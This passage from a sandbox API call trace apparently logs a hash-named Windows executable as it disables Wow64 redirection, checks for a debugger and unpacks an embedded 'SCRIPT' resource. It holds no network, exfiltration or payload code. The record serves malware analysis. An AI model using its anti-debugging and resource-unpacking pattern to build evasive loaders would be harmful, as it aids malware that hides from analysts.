(HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0117.170] IsThemeActive () returned 0x1 [0117.171] SystemParametersInfoW (in: uiAction=0x2000, uiParam=0x0, pvParam=0x7ffefc, fWinIni=0x0 | out: pvParam=0x7ffefc) returned 1 [0117.171] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x0, fWinIni=0x2 | out: pvParam=0x0) returned 1 [0117.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7bd0 [0117.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba20 [0117.172] GetCurrentDirectoryW (in: nBufferLength=0x7fff, lpBuffer=0x7efed0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0117.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7be8 [0117.172] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db9b0 [0117.172] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7cfe30, nSize=0x7fff | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe")) returned 0x62 [0117.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd0) returned 0x12c84a0 [0117.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db950 [0117.175] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", nBufferLength=0x7fff, lpBuffer=0x7bfe20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", lpFilePart=0x0) returned 0x62 [0117.175] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ca3d8 | out: hHeap=0x12c0000) returned 1 [0117.175] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd0) returned 0x12cbff8 [0117.175] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12c84a0 | out: hHeap=0x12c0000) returned 1 [0117.175] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12db950 | out: hHeap=0x12c0000) returned 1 [0117.175] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x12cb850 [0117.175] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba70 [0117.175] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74650000 [0117.176] GetProcAddress (hModule=0x74650000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x7466f350 [0117.176] Wow64DisableWow64FsRedirection (in: OldValue=0x7dfe34 | out: OldValue=0x7dfe34*=0x0) returned 1 [0117.176] FreeLibrary (hLibModule=0x74650000) returned 1 [0117.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x12c3cf0 [0117.177] GetCurrentPackageId () returned 0x3d54 [0117.177] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x7dfcd0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0117.177] GetFileType (hFile=0x1dc) returned 0x1 [0117.177] LoadLibraryExW (lpLibFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", hFile=0x0, dwFlags=0x2) returned 0xf20000 [0117.178] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74650000 [0117.178] GetProcAddress (hModule=0x74650000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x7466f330 [0117.178] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0117.178] FreeLibrary (hLibModule=0x74650000) returned 1 [0117.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10000) returned 0x12dc130 [0117.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbb10 [0117.179] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x7dfe90 | out: ppstm=0x7dfe90*=0x12dc098) returned 0x0 [0117.208] FindResourceExW (hModule=0xf20000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0xfe76c8 [0117.208] LoadResource (hModule=0xf20000, hResInfo=0xfe76c8) returned 0x11125ac [0117.208] SizeofResource (hModule=0xf20000, hResInfo=0xfe76c8) returned 0xea26 [0117.208] LockResource (hResData=0x11125ac) returned 0x11125ac [0117.209] ISequentialStream:RemoteWrite (in: This=0x12dc098, pv=0x11125ac*=0xa3, cb=0xea26, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0117.211] IStream:RemoteSeek (in: This=0x12dc098, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0117.211] IStream:RemoteSeek (in: This=0x12dc098, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0117.212] ISequentialStream:RemoteRead (in: This=0x12dc098, pv=0x12dc130, cb=0x18, pcbRead=0x7dfdbc | out: pv=0x12dc130*=0xa3, pcbRead=0x7dfdbc*=0x18) returned 0x0 [0117.212] IStream:RemoteSeek (in: This=0x12dc098, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0117.212] ISequentialStream:RemoteRead (in: This=0x12dc098, pv=0x7dfe00, cb=0x4, pcbRead=0x7dfdbc | out: pv=0x7dfe00*=0x45, pcbRead=0x7dfdbc*=0x4) returned 0x0 [0117.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbb10 | out: hHeap=0x12c0000) returned 1 [0117.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc130 | out: hHeap=0x12c0000) returned 1 [0117.212] ISequentialStream:RemoteRead (in: This=0x12dc098, pv=0x7dfe24, cb=0x10, pcbRead=0x7dfdfc | out: pv=0x7dfe24*=0x4d, pcbRead=0x7dfdfc*=0x10) returned 0x0 [0117.212] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7dfcf8 | out: lpSystemTimeAsFileTime=0x7dfcf8*(dwLowDateTime=0xd737656b, dwHighDateTime=0x1d7b451)) [0117.212] IStream:RemoteSeek (in: This=0x12dc098, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0117.212] IStream:RemoteSeek (in: This=0x12dc098, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0117.212] ISequentialStream:RemoteRead (in: This=0x12dc098, pv=0x7df778, cb=0x4, pcbRead=0x7df53c | out: pv=0x7df778*=0x6b, pcbRead=0x7df53c*=0x4) returned 0x0 [0117.212] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7df438 | out: lpSystemTimeAsFileTime=0x7df438*(dwLowDateTime=0xd737789f, dwHighDateTime=0x1d7b451)) [0117.213] ISequentialStream:RemoteRead (in: This=0x12dc098, pv=0x7df780, cb=0x4, pcbRead=0x7df53c | out: pv=0x7df780*=0xa6, pcbRead=0x7df53c*=0x4) returned 0x0 [0117.213] ISequentialStream:RemoteRead (in: This=0x12dc098, pv=0x7df568, cb=0x34, pcbRead=0x7df53c | out: pv=0x7df568*=0xe1, pcbRead=0x7df53c*=0x34) returned 0x0 [0117.213] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7df438 | out: lpSystemTimeAsFileTime=0x7df438*(dwLowDateTime=0xd737789f, dwHighDateTime=0x1d7b451)) [0117.213] ISequentialStream:RemoteRead (in: This=0x12dc098, pv=0x7df780, cb=0x4, pcbRead=0x7df53c | out: pv=0x7df780*=0x62, pcbRead=0x7df53c*=0x4) returned 0x0 [0117.213] ISequentialStream:RemoteRead (in: This=0x12dc098, pv=0x7df7ac, cb=0x84, pcbRead=0x7df53c | out: pv=0x7df7ac*=0x6c, pcbRead=0x7df53c*=0x84) returned 0x0 [0117.213] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7df438 | out: lpSystemTimeAsFileTime=0x7df438*(dwLowDateTime=0xd737789f, dwHighDateTime=0x1d7b451)) [0117.213] ISequentialStream:RemoteRead (in: This=0x12dc098, pv=0x7dfe33, cb=0x1, pcbRead=0x7df784 | out: pv=0x7dfe33*=0x0, pcbRead=0x7df784*=0x1) returned 0x0 [0117.213] ISequentialStream:RemoteRead (in: This=0x12dc098, pv=0x7dfe2c, cb=0x4, pcbRead=0x7df784 | out: pv=0x7dfe2c*=0xbc, pcbRead=0x7df784*=0x4) returned 0x0 [0117.213] ISequentialStream:RemoteRead (in: This=0x12dc098, pv=0x7dfe2c, cb=0x4, pcbRead=0x7df784 | out: pv=0x7dfe2c*=0xbc, pcbRead=0x7df784*=0x4) returned 0x0 [0117.213] ISequentialStream:RemoteRead (in: This=0x12dc098, pv=0x7dfe2c, cb=0x4, pcbRead=0x7df784 | out: pv=0x7dfe2c*=0x84, pcbRead=0x7df784*=0x4) returned 0x0 [0117.213] IStream:RemoteSeek (in: This=0x12dc098, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0117.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12db990 [0117.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12dba80 [0117.213] ISequentialStream:RemoteRead (in: This=0x12dc098, pv=0x12dba80, cb=0x0, pcbRead=0x7df784 | out: pv=0x12dba80*=0x0, pcbRead=0x7df784*=0x0) returned 0x0 [0117.213] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7df680 | out: lpSystemTimeAsFileTime=0x7df680*(dwLowDateTime=0xd737a1d3, dwHighDateTime=0x1d7b451)) [0117.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12db990 | out: hHeap=0x12c0000) returned 1 [0117.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dba80 | out: hHeap=0x12c0000) returned 1 [0117.214] CloseHandle (hObject=0x1dc) returned 1 [0117.214] IUnknown:Release (This=0x12dc098) returned 0x0 [0117.214] FreeLibrary (hLibModule=0xf20000) returned 1 [0117.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12cb850 | out: hHeap=0x12c0000) returned 1 [0117.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dba70 | out: hHeap=0x12c0000) returned 1 [0117.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12cd330 | out: hHeap=0x12c0000) returned 1 [0117.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd0) returned 0x12c84a0 [0117.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7c00 [0117.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbfd0 [0117.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba70 [0117.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbd78 [0117.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7c18 [0117.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbac0 [0117.215] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12d7c18 | out: hHeap=0x12c0000) returned 1 [0117.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbe68 [0117.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7b70 [0117.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7c18 [0117.215] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbfd0 | out: hHeap=0x12c0000) returned 1 [0117.215] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dba70 | out: hHeap=0x12c0000) returned 1 [0117.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7c30 [0117.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db950 [0117.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12ca3d8 [0117.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db9a0 [0117.215] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0117.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbf08 [0117.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12cd330 [0117.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba30 [0117.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc478 [0117.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12d7c30 | out: hHeap=0x12c0000) returned 1 [0117.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12db950 | out: hHeap=0x12c0000) returned 1 [0117.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc520 [0117.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbad0 [0117.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db9d0 [0117.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x12dc538 [0117.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db9f0 [0117.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc4d8 [0117.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc520 | out: hHeap=0x12c0000) returned 1 [0117.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbad0 | out: hHeap=0x12c0000) returned 1 [0117.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12d7c00 | out: hHeap=0x12c0000) returned 1 [0117.217] IsDebuggerPresent () returned 0 [0117.217] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", nBufferLength=0x7fff, lpBuffer=0x7bfe48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", lpFilePart=0x0) returned 0x62 [0117.217] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", lpszLongPath=0x7bfe48, cchBuffer=0x7fff | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe") returned 0x62 [0117.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc4c0 [0117.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db990 [0117.219] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", nBufferLength=0x7fff, lpBuffer=0x7bfe18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", lpFilePart=0x0) returned 0x62 [0117.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc4c0 | out: hHeap=0x12c0000) returned 1 [0117.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd0) returned 0x12dc758 [0117.226] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbf80 [0117.226] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc4f0 [0117.226] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbfa8 [0117.226] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba50 [0117.226] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74650000 [0117.226] GetProcAddress (hModule=0x74650000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x7466f350 [0117.227] Wow64DisableWow64FsRedirection (in: OldValue=0x7cfdb4 | out: OldValue=0x7cfdb4*=0x0) returned 1 [0117.227] FreeLibrary (hLibModule=0x74650000) returned 1 [0117.227] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x7cfc50, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0117.228] GetFileType (hFile=0x1dc) returned 0x1 [0117.228] LoadLibraryExW (lpLibFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", hFile=0x0, dwFlags=0x2) returned 0xf20000 [0117.228] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74650000 [0117.228] GetProcAddress (hModule=0x74650000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x7466f330 [0117.229] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0117.229] FreeLibrary (hLibModule=0x74650000) returned 1 [0117.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10000) returned 0x12dc830 [0117.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba70 [0117.229] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x7cfde4 | out: ppstm=0x7cfde4*=0x12dbf30) returned 0x0 [0117.229] FindResourceExW (hModule=0xf20000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0xfe76c8 [0117.229] LoadResource (hModule=0xf20000, hResInfo=0xfe76c8) returned 0x11125ac [0117.229] SizeofResource (hModule=0xf20000, hResInfo=0xfe76c8) returned 0xea26 [0117.230] LockResource (hResData=0x11125ac) returned 0x11125ac [0117.230] ISequentialStream:RemoteWrite (in: This=0x12dbf30, pv=0x11125ac*=0xa3, cb=0xea26, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0117.231] IStream:RemoteSeek (in: This=0x12dbf30, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0117.231] IStream:RemoteSeek (in: This=0x12dbf30, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0117.231] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x12dc830, cb=0x18, pcbRead=0x7cfd3c | out: pv=0x12dc830*=0xa3, pcbRead=0x7cfd3c*=0x18) returned 0x0 [0117.231] IStream:RemoteSeek (in: This=0x12dbf30, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0117.231] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cfd80, cb=0x4, pcbRead=0x7cfd3c | out: pv=0x7cfd80*=0x45, pcbRead=0x7cfd3c*=0x4) returned 0x0 [0117.231] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dba70 | out: hHeap=0x12c0000) returned 1 [0117.231] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc830 | out: hHeap=0x12c0000) returned 1 [0117.231] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cfda4, cb=0x10, pcbRead=0x7cfd7c | out: pv=0x7cfda4*=0x4d, pcbRead=0x7cfd7c*=0x10) returned 0x0 [0117.231] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cfc78 | out: lpSystemTimeAsFileTime=0x7cfc78*(dwLowDateTime=0xd73a5f15, dwHighDateTime=0x1d7b451)) [0117.232] IStream:RemoteSeek (in: This=0x12dbf30, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0117.232] IStream:RemoteSeek (in: This=0x12dbf30, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0117.232] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cf6f8, cb=0x4, pcbRead=0x7cf4bc | out: pv=0x7cf6f8*=0x6b, pcbRead=0x7cf4bc*=0x4) returned 0x0 [0117.232] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cf3b8 | out: lpSystemTimeAsFileTime=0x7cf3b8*(dwLowDateTime=0xd73a5f15, dwHighDateTime=0x1d7b451)) [0117.232] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cf700, cb=0x4, pcbRead=0x7cf4bc | out: pv=0x7cf700*=0xa6, pcbRead=0x7cf4bc*=0x4) returned 0x0 [0117.232] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cf4e8, cb=0x34, pcbRead=0x7cf4bc | out: pv=0x7cf4e8*=0xe1, pcbRead=0x7cf4bc*=0x34) returned 0x0 [0117.232] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cf3b8 | out: lpSystemTimeAsFileTime=0x7cf3b8*(dwLowDateTime=0xd73a7352, dwHighDateTime=0x1d7b451)) [0117.232] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cf700, cb=0x4, pcbRead=0x7cf4bc | out: pv=0x7cf700*=0x62, pcbRead=0x7cf4bc*=0x4) returned 0x0 [0117.232] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cf72c, cb=0x84, pcbRead=0x7cf4bc | out: pv=0x7cf72c*=0x6c, pcbRead=0x7cf4bc*=0x84) returned 0x0 [0117.232] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cf3b8 | out: lpSystemTimeAsFileTime=0x7cf3b8*(dwLowDateTime=0xd73a7352, dwHighDateTime=0x1d7b451)) [0117.232] IStream:RemoteSeek (in: This=0x12dbf30, dlibMove=0x1, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0117.232] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cf6f0, cb=0x4, pcbRead=0x7cf4bc | out: pv=0x7cf6f0*=0xbc, pcbRead=0x7cf4bc*=0x4) returned 0x0 [0117.233] IStream:RemoteSeek (in: This=0x12dbf30, dlibMove=0x18, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0117.233] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cf6f8, cb=0x4, pcbRead=0x7cf4bc | out: pv=0x7cf6f8*=0x6b, pcbRead=0x7cf4bc*=0x4) returned 0x0 [0117.233] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cf3b8 | out: lpSystemTimeAsFileTime=0x7cf3b8*(dwLowDateTime=0xd73a87b8, dwHighDateTime=0x1d7b451)) [0117.233] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cf700, cb=0x4, pcbRead=0x7cf4bc | out: pv=0x7cf700*=0xaf, pcbRead=0x7cf4bc*=0x4) returned 0x0 [0117.233] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cf4e8, cb=0x26, pcbRead=0x7cf4bc | out: pv=0x7cf4e8*=0xe6, pcbRead=0x7cf4bc*=0x26) returned 0x0 [0117.233] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cf3b8 | out: lpSystemTimeAsFileTime=0x7cf3b8*(dwLowDateTime=0xd73a9a59, dwHighDateTime=0x1d7b451)) [0117.233] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cf700, cb=0x4, pcbRead=0x7cf4bc | out: pv=0x7cf700*=0x66, pcbRead=0x7cf4bc*=0x4) returned 0x0 [0117.233] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cf72c, cb=0x8c, pcbRead=0x7cf4bc | out: pv=0x7cf72c*=0xde, pcbRead=0x7cf4bc*=0x8c) returned 0x0 [0117.233] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cf3b8 | out: lpSystemTimeAsFileTime=0x7cf3b8*(dwLowDateTime=0xd73a9a59, dwHighDateTime=0x1d7b451)) [0117.233] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cfdb3, cb=0x1, pcbRead=0x7cf704 | out: pv=0x7cfdb3*=0x1, pcbRead=0x7cf704*=0x1) returned 0x0 [0117.233] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cfdac, cb=0x4, pcbRead=0x7cf704 | out: pv=0x7cfdac*=0x86, pcbRead=0x7cf704*=0x4) returned 0x0 [0117.233] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cfdac, cb=0x4, pcbRead=0x7cf704 | out: pv=0x7cfdac*=0xc1, pcbRead=0x7cf704*=0x4) returned 0x0 [0117.233] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x7cfdac, cb=0x4, pcbRead=0x7cf704 | out: pv=0x7cfdac*=0x5f, pcbRead=0x7cf704*=0x4) returned 0x0 [0117.234] IStream:RemoteSeek (in: This=0x12dbf30, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0117.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4577d) returned 0x12fb270 [0117.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xe83a) returned 0x12dc830 [0117.236] ISequentialStream:RemoteRead (in: This=0x12dbf30, pv=0x12dc830, cb=0xe83a, pcbRead=0x7cf704 | out: pv=0x12dc830*=0x6d, pcbRead=0x7cf704*=0xe83a) returned 0x0 [0117.237] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cf600 | out: lpSystemTimeAsFileTime=0x7cf600*(dwLowDateTime=0xd73b2271, dwHighDateTime=0x1d7b451)) [0117.241] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20000) returned 0x13409f8 [0117.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10000) returned 0x1360a00 [0117.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10000) returned 0x1370a08 [0117.428] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13409f8 | out: hHeap=0x12c0000) returned 1 [0117.430] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1360a00 | out: hHeap=0x12c0000) returned 1 [0117.432] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1370a08 | out: hHeap=0x12c0000) returned 1 [0117.436] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc830 | out: hHeap=0x12c0000) returned 1 [0117.437] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10504) returned 0x13409f8 [0117.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xe) returned 0x12dc508 [0117.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc520 [0117.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba70 [0117.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc520 | out: 